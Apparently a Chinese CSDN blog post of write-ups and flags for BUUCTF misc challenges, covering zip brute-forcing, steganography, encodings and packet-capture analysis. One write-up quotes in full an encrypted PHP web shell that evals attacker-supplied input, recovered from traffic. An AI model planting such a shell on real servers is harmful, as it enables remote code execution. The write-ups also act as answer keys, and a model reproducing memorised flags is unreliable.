buuctf.misc 256-288

1、[BJDCTF 2nd]最简单的misc-y1ng

题解:
(1)zip伪加密和png文件头部修复
首先使用随波逐流工具修复zip文件的伪加密;然后使用010修复文件头部就可以

在这里插入图片描述

2、[BSidesSF2019]delta

题解:一个简单的脑洞题目

3、[GKCTF X DASCTF应急挑战杯]

题解:简单的流量包的分析
(1)追踪http发现了异常的流量
在这里插入图片描述
然后首先hex解码;然后base64解码;发现了倒叙的base64编码内容;反转之后解密得到正确的flag

a = 'wIDIgACIgACIgAyIK0wIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMiCNoQD'
b='jMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjoQDjACIgACIgACIggDM6EDM6AjMgAzMtMDMtEjM'
c='t0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0iCNMyIjMyIjMyIjMyI'
d='6AjMgAzMtMDMtEjMwIjO0eZ62ep5K0wKrQWYwVGdv5EItAiM1Aydl5mK6M6jlfpqnrQDt0SLt0SL'
e='t0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLK0AIdZavo75mlvlCNMTM6EDM'
f='z0yMw0SMyAjM6Q7lpb7lmrQDrsCZhBXZ09mTg0CIyUDI3VmbqozoPW+lqeuCN0SLt0SLt0SLt0SL'
g='sxWZld1V913e7d2ZhFGbsZmZg0lp9iunbW+Wg0lp9iunbW+Wg0lp9iunbW+WK0wMxoTMwoDMyACM'
h='DN0QDN0QDlWazNXMx0Wbf9lRGRDNDN0ard0Rf9VZl1WbwADIdRampDKilvFIdRampDKilvVKpM2Y'
i='==QIhM0QDN0Q'
a=a[::-1]
b=b[::-1]
c=c[::-1]
d=d[::-1]
e=e[::-1]
f=f[::-1]
g=g[::-1]
h=h[::-1]
i=i[::-1]
print(a+b+c+d+e+f+g+h+i)
#ffllaagg{{}}WWeellcc00mmee__GGkkCC44FF__mm11ssiiCCCCCCCCCCCC!!

4、[Dest0g3 520迎新赛]EasyEncode

题解:
(1)首先就是简单的zip爆破
在这里插入图片描述
(2)首先就是莫斯电码解密;然后hex解码

\u0052\u0047\u0056\u007a\u0064\u0044\u0042\u006e\u004d\u0033\u0074\u0045\u005a\u0057\u0039\u006b\u0061\u0057\u0035\u006e\u0058\u007a\u0046\u007a\u0058\u0032\u0055\u0030\u0063\u0033\u006c\u0066\u004e\u0046\u0039\u0056\u0066\u0051\u0025\u0033\u0044\u0025\u0033\u0044**加粗样式**

一眼就是unicode解密得到base64字符串;然后解密就行

在这里插入图片描述

5、[DASCTF Oct X 吉林工师 欢迎来到魔法世界~]giveyourflag

题解:
(1)使用010打开发现了明显的PK;压缩包
(2)发现嵌套了多层的zip压缩包;肯定最后一个压缩包中的内容就是flag;chat 一个脚本;解密到最后得到:

R0RWRldJezdnZ3FnbGwzanl1a2RuY3N0aTlpY3BjM2ZlYjB2NW9wfQ==

base64解密就是正确的flag

6、[NewStarCTF 公开赛赛道]奇怪的PDF

题解:PDF隐写
(1)题目提示是pdf隐写;发现文件头部错误;先修复
在这里插入图片描述
(2)打开PDF 并没有发现啥有用的信息;可能是wbStego隐写:然后直接得到正确的flag
在这里插入图片描述

7、[NewStarCTF 公开赛赛道]qsdz’s girlfriend 1

题解:
(1)给了一个压缩包,提示他男朋友的生日,生日只算数字的话最多8位最小6位,用ARCHPR爆破,密码为20031201
(2)打开压缩包发现是一张png;最后发现是LSB隐写;得到一串base64编码;解密得到提示

My girlfriend's name has six letters and the first letter is capitalized

(3)最后百度找到了他男朋友的名字;并且生日是20031201
在这里插入图片描述

8、[NewStarCTF 2023 公开赛道]3-溯源

题解:流量包 AES解密
(1)首先看以下http流量

http contains "eval"

发现了特殊的字段;尝试解密
在这里插入图片描述
得到了key

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b";
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?

审计代码发现进行了AES加密;继续分析流量包寻找密文
在这里插入图片描述
尝试解密:成功找到base64编码的用户名在这里插入图片描述

9、大怨种

题解:gif分离
(1)首先gif分离得到二维码
在这里插入图片描述
然后汉明码在线解密得到lflag
在这里插入图片描述

10、[GKCTF X DASCTF应急挑战杯]excel 骚操作

题解:excel隐写
(1)某些单元格设置了只有双击击才能显示内容的格式,Ctrl+A全选然后右键,选择清楚内容->格式
在这里插入图片描述
(2)根据上述猜测是二维码;选中该范围Ctrl+H替换,替换为框点击格式,选择背景颜色选择一个黑色单元格
在这里插入图片描述
(3)汉信码扫码解密就行
flag{9ee0cb62-f443-4a72-e9a3-43c0b910757e}

陆续更新中…

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

巅峰赛2000分以下是巅峰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值